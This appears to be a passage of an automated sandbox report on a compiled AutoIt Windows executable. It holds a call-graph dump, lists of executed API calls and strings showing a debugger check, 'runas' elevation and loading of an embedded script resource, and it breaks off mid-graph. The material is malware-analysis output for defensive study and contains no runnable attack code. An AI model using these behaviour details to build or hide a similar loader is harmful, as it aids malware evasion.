7ff79f8a55d4 15 API calls abort 95462->95521 95466 7ff79f8a486f 95464->95466 95467 7ff79f8a4862 95464->95467 95465 7ff79f8a482f 95522 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95465->95522 95509 7ff79f8afeb4 95466->95509 95523 7ff79f8a55d4 15 API calls abort 95467->95523 95471 7ff79f8764cf 95471->95365 95471->95366 95473 7ff79f8a4890 95516 7ff79f8b0304 95473->95516 95474 7ff79f8a4883 95524 7ff79f8a55d4 15 API calls abort 95474->95524 95477 7ff79f8a48a3 95525 7ff79f89df60 LeaveCriticalSection 95477->95525 95663 7ff79f876d1c 95479->95663 95482 7ff79f876cf1 95483 7ff79f8764f7 95482->95483 95484 7ff79f876d0f FreeLibrary 95482->95484 95486 7ff79f876580 95483->95486 95484->95483 95485 7ff79f876d1c 2 API calls 95485->95482 95487 7ff79f894c68 4 API calls 95486->95487 95488 7ff79f8765b5 memcpy_s 95487->95488 95489 7ff79f8bc9f5 95488->95489 95490 7ff79f876740 CreateStreamOnHGlobal 95488->95490 95496 7ff79f876602 95488->95496 95667 7ff79f8f2e00 45 API calls 95489->95667 95492 7ff79f876759 FindResourceExW 95490->95492 95490->95496 95492->95496 95493 7ff79f8bc97e LoadResource 95495 7ff79f8bc997 SizeofResource 95493->95495 95493->95496 95494 7ff79f8767d8 45 API calls 95494->95496 95495->95496 95498 7ff79f8bc9ae LockResource 95495->95498 95496->95493 95496->95494 95497 7ff79f8bc9fd 95496->95497 95500 7ff79f8766e8 95496->95500 95499 7ff79f8767d8 45 API calls 95497->95499 95498->95496 95499->95500 95500->95373 95502 7ff79f8767f7 95501->95502 95503 7ff79f8bca6c 95501->95503 95668 7ff79f8a4c5c 95502->95668 95506 7ff79f8f240c 95687 7ff79f8f2200 95506->95687 95508 7ff79f8f2430 95508->95381 95526 7ff79f8ab9bc EnterCriticalSection 95509->95526 95511 7ff79f8afecb 95512 7ff79f8aff54 18 API calls 95511->95512 95513 7ff79f8afed6 95512->95513 95514 7ff79f8aba10 _isindst LeaveCriticalSection 95513->95514 95515 7ff79f8a4879 95514->95515 95515->95473 95515->95474 95527 7ff79f8b0040 95516->95527 95519 7ff79f8b035e 95519->95477 95521->95465 95522->95471 95523->95471 95524->95471 95532 7ff79f8b007d try_get_function 95527->95532 95529 7ff79f8b02de 95546 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95529->95546 95531 7ff79f8b021a 95531->95519 95539 7ff79f8b7738 95531->95539 95535 7ff79f8b0211 95532->95535 95542 7ff79f89db68 37 API calls 4 library calls 95532->95542 95534 7ff79f8b0277 95534->95535 95543 7ff79f89db68 37 API calls 4 library calls 95534->95543 95535->95531 95545 7ff79f8a55d4 15 API calls abort 95535->95545 95537 7ff79f8b029a 95537->95535 95544 7ff79f89db68 37 API calls 4 library calls 95537->95544 95547 7ff79f8b6d04 95539->95547 95542->95534 95543->95537 95544->95535 95545->95529 95546->95531 95548 7ff79f8b6d40 95547->95548 95549 7ff79f8b6d28 95547->95549 95548->95549 95552 7ff79f8b6d6d 95548->95552 95601 7ff79f8a55d4 15 API calls abort 95549->95601 95551 7ff79f8b6d2d 95602 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95551->95602 95558 7ff79f8b7348 95552->95558 95556 7ff79f8b6d39 95556->95519 95604 7ff79f8b7078 95558->95604 95561 7ff79f8b73d3 95624 7ff79f8ae418 95561->95624 95562 7ff79f8b73bc 95636 7ff79f8a55b4 15 API calls abort 95562->95636 95566 7ff79f8b73c1 95637 7ff79f8a55d4 15 API calls abort 95566->95637 95567 7ff79f8b73df 95638 7ff79f8a55b4 15 API calls abort 95567->95638 95568 7ff79f8b73f7 CreateFileW 95570 7ff79f8b7469 95568->95570 95571 7ff79f8b74eb GetFileType 95568->95571 95574 7ff79f8b74b8 GetLastError 95570->95574 95579 7ff79f8b7478 CreateFileW 95570->95579 95575 7ff79f8b7549 95571->95575 95576 7ff79f8b74f8 GetLastError 95571->95576 95573 7ff79f8b73e4 95639 7ff79f8a55d4 15 API calls abort 95573->95639 95640 7ff79f8a5564 15 API calls 2 library calls 95574->95640 95643 7ff79f8ae334 16 API calls fread_s 95575->95643 95641 7ff79f8a5564 15 API calls 2 library calls 95576->95641 95579->95571 95579->95574 95581 7ff79f8b7507 CloseHandle 95581->95566 95582 7ff79f8b7539 95581->95582 95642 7ff79f8a55d4 15 API calls abort 95582->95642 95585 7ff79f8b753e 95585->95566 95586 7ff79f8b7568 95590 7ff79f8b75b5 95586->95590 95644 7ff79f8b7284 67 API calls fread_s 95586->95644 95589 7ff79f8b75e8 95591 7ff79f8b75fe 95589->95591 95592 7ff79f8b75ec 95589->95592 95590->95592 95645 7ff79f8b6de4 67 API calls 3 library calls 95590->95645 95594 7ff79f8b6d95 95591->95594 95595 7ff79f8b7681 CloseHandle CreateFileW 95591->95595 95646 7ff79f8b04b8 95592->95646 95594->95556 95603 7ff79f8ae3f4 LeaveCriticalSection 95594->95603 95596 7ff79f8b76f9 95595->95596 95597 7ff79f8b76cb GetLastError 95595->95597 95596->95594 95661 7ff79f8a5564 15 API calls 2 library calls 95597->95661 95599 7ff79f8b76d8 95662 7ff79f8ae548 16 API calls fread_s 95599->95662 95601->95551 95602->95556 95605 7ff79f8b70a4 95604->95605 95611 7ff79f8b70be 95604->95611 95606 7ff79f8a55d4 fread_s 15 API calls 95605->95606 95605->95611 95607 7ff79f8b70b3 95606->95607 95608 7ff79f8ab164 _invalid_parameter_noinfo 31 API calls 95607->95608 95608->95611 95609 7ff79f8b718c 95613 7ff79f8a2554 31 API calls 95609->95613 95623 7ff79f8b71ec 95609->95623 95610 7ff79f8b713b 95610->95609 95612 7ff79f8a55d4 fread_s 15 API calls 95610->95612 95611->95610 95615 7ff79f8a55d4 fread_s 15 API calls 95611->95615 95616 7ff79f8b7181 95612->95616 95614 7ff79f8b71e8 95613->95614 95617 7ff79f8b726b 95614->95617 95614->95623 95618 7ff79f8b7130 95615->95618 95619 7ff79f8ab164 _invalid_parameter_noinfo 31 API calls 95616->95619 95620 7ff79f8ab184 _isindst 16 API calls 95617->95620 95621 7ff79f8ab164 _invalid_parameter_noinfo 31 API calls 95618->95621 95619->95609 95622 7ff79f8b7280 95620->95622 95621->95610 95623->95561 95623->95562 95625 7ff79f8ab9bc _isindst EnterCriticalSection 95624->95625 95631 7ff79f8ae43b 95625->95631 95626 7ff79f8ae487 95627 7ff79f8aba10 _isindst LeaveCriticalSection 95626->95627 95629 7ff79f8ae52a 95627->95629 95628 7ff79f8ae464 95630 7ff79f8ae170 16 API calls 95628->95630 95629->95567 95629->95568 95632 7ff79f8ae469 95630->95632 95631->95626 95631->95628 95633 7ff79f8ae4c2 EnterCriticalSection 95631->95633 95632->95626 95635 7ff79f8ae310 fwprintf EnterCriticalSection 95632->95635 95633->95626 95634 7ff79f8ae4d1 LeaveCriticalSection 95633->95634 95634->95631 95635->95626 95636->95566 95637->95594 95638->95573 95639->95566 95640->95566 95641->95581 95642->95585 95643->95586 95644->95590 95645->95589 95647 7ff79f8ae604 31 API calls 95646->95647 95649 7ff79f8b04cc 95647->95649 95648 7ff79f8b04d2 95650 7ff79f8ae548 16 API calls 95648->95650 95649->95648 95651 7ff79f8b050c 95649->95651 95654 7ff79f8ae604 31 API calls 95649->95654 95653 7ff79f8b0534 95650->95653 95651->95648 95652 7ff79f8ae604 31 API calls 95651->95652 95655 7ff79f8b0518 CloseHandle 95652->95655 95656 7ff79f8b0560 95653->95656 95659 7ff79f8a5564 fread_s 15 API calls 95653->95659 95657 7ff79f8b04ff 95654->95657 95655->95648 95658 7ff79f8b0525 GetLastError 95655->95658 95656->95594 95660 7ff79f8ae604 31 API calls 95657->95660 95658->95648 95659->95656 95660->95651 95661->95599 95662->95596 95664 7ff79f876d2c LoadLibraryA 95663->95664 95665 7ff79f876ce3 95663->95665 95664->95665 95666 7ff79f876d41 GetProcAddress 95664->95666 95665->95482 95665->95485 95666->95665 95667->95497 95671 7ff79f8a4c7c 95668->95671 95672 7ff79f87680a 95671->95672 95673 7ff79f8a4ca6 95671->95673 95672->95506 95673->95672 95674 7ff79f8a4cb5 __scrt_get_show_window_mode 95673->95674 95675 7ff79f8a4cd7 95673->95675 95684 7ff79f8a55d4 15 API calls abort 95674->95684 95686 7ff79f89df54 EnterCriticalSection 95675->95686 95679 7ff79f8a4cca 95685 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95679->95685 95684->95679 95685->95672 95690 7ff79f8a47bc 95687->95690 95689 7ff79f8f2210 95689->95508 95693 7ff79f8a4724 95690->95693 95694 7ff79f8a4732 95693->95694 95695 7ff79f8a4746 95693->95695 95701 7ff79f8a55d4 15 API calls abort 95694->95701 95700 7ff79f8a4742 95695->95700 95703 7ff79f8abef8 6 API calls __crtLCMapStringW 95695->95703 95698 7ff79f8a4737 95702 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95698->95702 95700->95689 95701->95698 95702->95700 95703->95700 95705 7ff79f881a48 95704->95705 95706 7ff79f881c5f 95704->95706 95712 7ff79f881a90 95705->95712 95721 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95705->95721 95706->95384 95712->95384 95716 7ff79f87f1ce 95715->95716 95718 7ff79f87f1d8 95715->95718 95717 7ff79f881a30 45 API calls 95716->95717 95717->95718 95718->95394 95719->95391 95720->95388 95722->95407 95723->95412 95724->95406 95725->95413 95726->95417 95727->95428 95728->95426 95733 7ff79f8f2bae 95729->95733 95730 7ff79f8f29da 95730->95433 95730->95446 95731 7ff79f8767d8 45 API calls 95731->95733 95732 7ff79f8f240c 32 API calls 95732->95733 95733->95730 95733->95731 95733->95732 95735 7ff79f8f1d61 95734->95735 95736 7ff79f8f1d71 95734->95736 95737 7ff79f8a48e0 89 API calls 95735->95737 95738 7ff79f8f1dbf 95736->95738 95739 7ff79f8a48e0 89 API calls 95736->95739 95748 7ff79f8f1d7a 95736->95748 95737->95736 95761 7ff79f8f2038 95738->95761 95740 7ff79f8f1d9e 95739->95740 95740->95738 95742 7ff79f8f1da7 95740->95742 95742->95748 95773 7ff79f8a4970 95742->95773 95743 7ff79f8f1df5 95744 7ff79f8f1e1c 95743->95744 95745 7ff79f8f1df9 95743->95745 95750 7ff79f8f1e4a 95744->95750 95751 7ff79f8f1e2a 95744->95751 95747 7ff79f8a4970 62 API calls 95745->95747 95749 7ff79f8f1e07 95745->95749 95747->95749 95748->95446 95749->95748 95752 7ff79f8a4970 62 API calls 95749->95752 95765 7ff79f8f1e88 95750->95765 95753 7ff79f8f1e38 95751->95753 95755 7ff79f8a4970 62 API calls 95751->95755 95752->95748 95753->95748 95756 7ff79f8a4970 62 API calls 95753->95756 95755->95753 95756->95748 95757 7ff79f8f1e52 95758 7ff79f8f1e68 95757->95758 95759 7ff79f8a4970 62 API calls 95757->95759 95758->95748 95760 7ff79f8a4970 62 API calls 95758->95760 95759->95758 95760->95748 95762 7ff79f8f2069 95761->95762 95764 7ff79f8f2056 memcpy_s 95761->95764 95763 7ff79f8a4c5c _fread_nolock 45 API calls 95762->95763 95763->95764 95764->95743 95766 7ff79f8f1fb0 95765->95766 95772 7ff79f8f1eaa 95765->95772 95768 7ff79f8f1fd3 95766->95768 95787 7ff79f8a2a04 60 API calls 2 library calls 95766->95787 95768->95757 95769 7ff79f8f1bd0 45 API calls 95769->95772 95772->95766 95772->95768 95772->95769 95785 7ff79f8f1c9c 45 API calls 95772->95785 95786 7ff79f8f20cc 60 API calls 95772->95786 95774 7ff79f8a49a3 95773->95774 95775 7ff79f8a498e 95773->95775 95784 7ff79f8a499e 95774->95784 95788 7ff79f89df54 EnterCriticalSection 95774->95788 95789 7ff79f8a55d4 15 API calls abort 95775->95789 95777 7ff79f8a4993 95790 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95777->95790 95780 7ff79f8a49b9 95781 7ff79f8a48ec 60 API calls 95780->95781 95782 7ff79f8a49c2 95781->95782 95783 7ff79f89df60 fflush LeaveCriticalSection 95782->95783 95783->95784 95784->95748 95785->95772 95786->95772 95787->95768 95789->95777 95790->95784 95792 7ff79f8b8f90 wcsftime 95791->95792 95793 7ff79f873ec4 GetLongPathNameW 95792->95793 95794 7ff79f877cf4 4 API calls 95793->95794 95795 7ff79f873eed 95794->95795 95796 7ff79f874074 95795->95796 95797 7ff79f879640 4 API calls 95796->95797 95798 7ff79f87408e 95797->95798 95799 7ff79f8756d4 5 API calls 95798->95799 95800 7ff79f87409b 95799->95800 95801 7ff79f8740a7 95800->95801 95802 7ff79f8bbada 95800->95802 95804 7ff79f874680 4 API calls 95801->95804 95806 7ff79f8bbb0f 95802->95806 95843 7ff79f891ad0 CompareStringW 95802->95843 95805 7ff79f8740b5 95804->95805 95839 7ff79f8740e8 95805->95839 95808 7ff79f8740cb Concurrency::wait 95808->95317 95810 7ff79f876460 105 API calls 95809->95810 95811 7ff79f8763e5 95810->95811 95812 7ff79f8bc656 95811->95812 95813 7ff79f876460 105 API calls 95811->95813 95814 7ff79f8f2948 90 API calls 95812->95814 95815 7ff79f876400 95813->95815 95816 7ff79f8bc66e 95814->95816 95815->95812 95817 7ff79f876408 95815->95817 95818 7ff79f8bc672 95816->95818 95819 7ff79f8bc690 95816->95819 95822 7ff79f876414 95817->95822 95823 7ff79f8bc67b 95817->95823 95820 7ff79f87652c 63 API calls 95818->95820 95821 7ff79f894c68 4 API calls 95819->95821 95820->95823 95838 7ff79f8bc6dd Concurrency::wait 95821->95838 95844 7ff79f87e774 143 API calls Concurrency::wait 95822->95844 95845 7ff79f8ec5c8 77 API calls wprintf 95823->95845 95826 7ff79f8bc68a 95826->95819 95827 7ff79f876438 95827->95310 95828 7ff79f8bc895 95829 7ff79f87652c 63 API calls 95828->95829 95837 7ff79f8bc8a9 95829->95837 95834 7ff79f87ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95834->95838 95837->95828 95851 7ff79f8e76d8 77 API calls 3 library calls 95837->95851 95838->95828 95838->95834 95838->95837 95846 7ff79f8e7400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95838->95846 95847 7ff79f8e730c 39 API calls 95838->95847 95848 7ff79f8f0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95838->95848 95849 7ff79f87b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95838->95849 95850 7ff79f879940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95838->95850 95840 7ff79f874107 95839->95840 95842 7ff79f874130 memcpy_s 95839->95842 95841 7ff79f894c68 4 API calls 95840->95841 95841->95842 95842->95808 95843->95802 95844->95827 95845->95826 95846->95838 95847->95838 95848->95838 95849->95838 95850->95838 95851->95837 95853 7ff79f879762 95852->95853 95858 7ff79f87988d 95852->95858 95854 7ff79f894c68 4 API calls 95853->95854 95853->95858 95856 7ff79f879791 95854->95856 95855 7ff79f894c68 4 API calls 95857 7ff79f87981c 95855->95857 95856->95855 95857->95858 95864 7ff79f87abe0 81 API calls 2 library calls 95857->95864 95865 7ff79f879940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95857->95865 95866 7ff79f87b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95857->95866 95858->95322 95862->95325 95863->95327 95864->95857 95865->95857 95866->95857 95867->95337 95868 7ff79f885f13 95869 7ff79f885f1c memcpy_s 95868->95869 95870 7ff79f87d4cc 48 API calls 95869->95870 95871 7ff79f885abd memcpy_s Concurrency::wait 95869->95871 95872 7ff79f8d14b6 95869->95872 95875 7ff79f885f74 95869->95875 95878 7ff79f894c68 4 API calls 95869->95878 95870->95869 95879 7ff79f89364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95872->95879 95874 7ff79f8d14c5 95876 7ff79f87e0a8 4 API calls 95874->95876 95877 7ff79f87b960 4 API calls 95875->95877 95876->95871 95877->95871 95878->95869 95879->95874 95880 7ff79f898fac 95881 7ff79f898fd2 GetModuleHandleW 95880->95881 95882 7ff79f89901c 95880->95882 95881->95882 95888 7ff79f898fdf 95881->95888 95897 7ff79f8ab9bc EnterCriticalSection 95882->95897 95884 7ff79f8990cb 95885 7ff79f8aba10 _isindst LeaveCriticalSection 95884->95885 95887 7ff79f8990f0 95885->95887 95886 7ff79f8990a0 95889 7ff79f8990b8 95886->95889 95893 7ff79f8aada4 75 API calls 95886->95893 95890 7ff79f8990fc 95887->95890 95895 7ff79f899118 11 API calls 95887->95895 95888->95882 95898 7ff79f899164 GetModuleHandleExW 95888->95898 95894 7ff79f8aada4 75 API calls 95889->95894 95891 7ff79f8aaa8c 30 API calls 95891->95886 95893->95889 95894->95884 95895->95890 95896 7ff79f899026 95896->95884 95896->95886 95896->95891 95899 7ff79f8991b5 95898->95899 95900 7ff79f89918e GetProcAddress 95898->95900 95902 7ff79f8991bf FreeLibrary 95899->95902 95903 7ff79f8991c5 95899->95903 95900->95899 95901 7ff79f8991a8 95900->95901 95901->95899 95902->95903 95903->95882 95904 7ff79f8847e1 95905 7ff79f884d57 95904->95905 95909 7ff79f8847f2 95904->95909 95935 7ff79f87ee20 5 API calls Concurrency::wait 95905->95935 95907 7ff79f884d66 95936 7ff79f87ee20 5 API calls Concurrency::wait 95907->95936 95909->95907 95910 7ff79f884862 95909->95910 95911 7ff79f884df3 95909->95911 95913 7ff79f8866c0 300 API calls 95910->95913 95915 7ff79f883c80 95910->95915 95937 7ff79f8f0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95911->95937 95913->95915 95914 7ff79f883dde 95915->95914 95916 7ff79f8d05be 95915->95916 95921 7ff79f884fe7 95915->95921 95923 7ff79f8950b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95915->95923 95926 7ff79f87e0a8 4 API calls 95915->95926 95927 7ff79f884a8f 95915->95927 95929 7ff79f884aa9 95915->95929 95931 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95915->95931 95932 7ff79f894f0c 34 API calls __scrt_initialize_thread_safe_statics 95915->95932 95933 7ff79f879640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95915->95933 95934 7ff79f885360 300 API calls Concurrency::wait 95915->95934 95938 7ff79f8f34e4 77 API calls 3 library calls 95915->95938 95939 7ff79f8f34e4 77 API calls 3 library calls 95916->95939 95919 7ff79f8d05d1 95920 7ff79f884ac0 95925 7ff79f87e0a8 4 API calls 95921->95925 95922 7ff79f87e0a8 4 API calls 95922->95914 95923->95915 95924 7ff79f8cfefe 95928 7ff79f87e0a8 4 API calls 95924->95928 95925->95914 95926->95915 95927->95920 95927->95924 95927->95929 95928->95920 95929->95920 95929->95922 95931->95915 95932->95915 95933->95915 95934->95915 95935->95907 95936->95911 95937->95915 95938->95915 95939->95919

                                                                                Executed Functions

                                                                                Function 00007FF79F8737B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8737F2
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873807
                                                                                • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F87388D
                                                                                  • Part of subcall function 00007FF79F873F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF79F8738BF,?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873FFD
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873924
                                                                                • MessageBoxA.USER32 ref: 00007FF79F8BB888
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8BB8E1
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8BB968
                                                                                • ShellExecuteW.SHELL32 ref: 00007FF79F8BB98F
                                                                                  • Part of subcall function 00007FF79F873B84: GetSysColorBrush.USER32 ref: 00007FF79F873B9E
                                                                                  • Part of subcall function 00007FF79F873B84: LoadCursorW.USER32 ref: 00007FF79F873BAE
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BC3
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BDC
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BF5
                                                                                  • Part of subcall function 00007FF79F873B84: LoadImageW.USER32 ref: 00007FF79F873C21
                                                                                  • Part of subcall function 00007FF79F873B84: RegisterClassExW.USER32 ref: 00007FF79F873C85
                                                                                  • Part of subcall function 00007FF79F873CBC: CreateWindowExW.USER32 ref: 00007FF79F873D0C
                                                                                  • Part of subcall function 00007FF79F873CBC: CreateWindowExW.USER32 ref: 00007FF79F873D5F
                                                                                  • Part of subcall function 00007FF79F873CBC: ShowWindow.USER32 ref: 00007FF79F873D75
                                                                                  • Part of subcall function 00007FF79F876258: Shell_NotifyIconW.SHELL32 ref: 00007FF79F876350
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 1593035822-3287110873
                                                                                • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                • Instruction ID: 6ca34f817267e5e1e2f6988ca8d6d4c6f18eb4a479c8ea769442642d3e3416dd
                                                                                • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                • Instruction Fuzzy Hash: B9714261A1D9C395EA70BB30E880AF9E760BF51364FC00135D54D866ADDF6CE659D330
                                                                                Function 00007FF79F876580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 352 7ff79f876580-7ff79f8765fc call 7ff79f894c68 call 7ff79f876c98 call 7ff79f895d00 359 7ff79f876737-7ff79f87673a 352->359 360 7ff79f876602-7ff79f876606 352->360 361 7ff79f8bc9f5-7ff79f8bc9fd call 7ff79f8f2e00 359->361 362 7ff79f876740-7ff79f876753 CreateStreamOnHGlobal 359->362 363 7ff79f87660c-7ff79f876617 call 7ff79f8a5514 360->363 364 7ff79f8bca03-7ff79f8bca1e 360->364 361->364 362->360 366 7ff79f876759-7ff79f876777 FindResourceExW 362->366 372 7ff79f87661b-7ff79f87664e call 7ff79f8767d8 363->372 375 7ff79f8bca27-7ff79f8bca60 call 7ff79f876810 call 7ff79f8767d8 364->375 366->360 371 7ff79f87677d 366->371 373 7ff79f8bc97e-7ff79f8bc991 LoadResource 371->373 380 7ff79f8766e8 372->380 381 7ff79f876654-7ff79f87665f 372->381 373->360 376 7ff79f8bc997-7ff79f8bc9a8 SizeofResource 373->376 384 7ff79f8766ee 375->384 397 7ff79f8bca66 375->397 376->360 379 7ff79f8bc9ae-7ff79f8bc9ba LockResource 376->379 379->360 383 7ff79f8bc9c0-7ff79f8bc9f0 379->383 380->384 385 7ff79f8766ae-7ff79f8766b2 381->385 386 7ff79f876661-7ff79f87666f 381->386 383->360 388 7ff79f8766f1-7ff79f876715 384->388 385->380 390 7ff79f8766b4-7ff79f8766cf call 7ff79f876810 385->390 389 7ff79f876670-7ff79f87667d 386->389 393 7ff79f876729-7ff79f876736 388->393 394 7ff79f876717-7ff79f876724 call 7ff79f894c24 * 2 388->394 395 7ff79f876680-7ff79f87668f 389->395 390->372 394->393 400 7ff79f8766d4-7ff79f8766dd 395->400 401 7ff79f876691-7ff79f876695 395->401 397->388 403 7ff79f8766e3-7ff79f8766e6 400->403 404 7ff79f876782-7ff79f87678c 400->404 401->375 406 7ff79f87669b-7ff79f8766a8 401->406 403->401 409 7ff79f87678e 404->409 410 7ff79f876797-7ff79f8767a1 404->410 406->389 408 7ff79f8766aa 406->408 408->385 409->410 411 7ff79f8767ce 410->411 412 7ff79f8767a3-7ff79f8767ad 410->412 411->373 413 7ff79f8767c6 412->413 414 7ff79f8767af-7ff79f8767bb 412->414 413->411 414->395 415 7ff79f8767c1 414->415 415->413
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: AU3!$EA06$SCRIPT
                                                                                • API String ID: 3051347437-2925976212
                                                                                • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                • Instruction ID: d1cbb4bc29f9a1a6072f08e996638ef2bb22c0cc1c30c03d227489cdcbd85a1b
                                                                                • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                • Instruction Fuzzy Hash: CC9121B2B0968186EBB0AB319444FFDA7A0BB45B88FC14135DE5D87784DF38E494A720
                                                                                Function 00007FF79F891D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 482 7ff79f891d80-7ff79f891e17 call 7ff79f879640 GetVersionExW call 7ff79f877cf4 487 7ff79f8d9450 482->487 488 7ff79f891e1d 482->488 489 7ff79f8d9457-7ff79f8d945d 487->489 490 7ff79f891e20-7ff79f891e46 call 7ff79f87dda4 488->490 491 7ff79f8d9463-7ff79f8d9480 489->491 496 7ff79f891fc1 490->496 497 7ff79f891e4c 490->497 491->491 493 7ff79f8d9482-7ff79f8d9485 491->493 493->490 495 7ff79f8d948b-7ff79f8d9491 493->495 495->489 498 7ff79f8d9493 495->498 496->487 499 7ff79f891e53-7ff79f891e59 497->499 501 7ff79f8d9498-7ff79f8d94a1 498->501 500 7ff79f891e5f-7ff79f891e7c 499->500 500->500 502 7ff79f891e7e-7ff79f891e81 500->502 501->499 503 7ff79f8d94a7 501->503 502->501 504 7ff79f891e87-7ff79f891ed6 call 7ff79f87dda4 502->504 503->496 507 7ff79f8d9645-7ff79f8d964d 504->507 508 7ff79f891edc-7ff79f891ede 504->508 511 7ff79f8d964f-7ff79f8d9658 507->511 512 7ff79f8d965a-7ff79f8d965d 507->512 509 7ff79f891ee4-7ff79f891efa 508->509 510 7ff79f8d94ac-7ff79f8d94af 508->510 515 7ff79f891f00-7ff79f891f02 509->515 516 7ff79f8d9572-7ff79f8d9579 509->516 517 7ff79f8d94b5-7ff79f8d9501 510->517 518 7ff79f891f3c-7ff79f891f80 GetCurrentProcess IsWow64Process call 7ff79f896240 510->518 513 7ff79f8d9686-7ff79f8d9692 511->513 512->513 514 7ff79f8d965f-7ff79f8d9674 512->514 527 7ff79f8d969d-7ff79f8d96b3 call 7ff79f8e32f4 513->527 519 7ff79f8d9676-7ff79f8d967d 514->519 520 7ff79f8d967f 514->520 523 7ff79f891f08-7ff79f891f0b 515->523 524 7ff79f8d959e-7ff79f8d95b3 515->524 521 7ff79f8d957b-7ff79f8d9584 516->521 522 7ff79f8d9589-7ff79f8d9599 516->522 517->518 526 7ff79f8d9507-7ff79f8d950e 517->526 518->527 539 7ff79f891f86-7ff79f891f8b GetSystemInfo 518->539 519->513 520->513 521->518 522->518 528 7ff79f891f11-7ff79f891f2d 523->528 529 7ff79f8d95ed-7ff79f8d95f0 523->529 530 7ff79f8d95c3-7ff79f8d95d3 524->530 531 7ff79f8d95b5-7ff79f8d95be 524->531 533 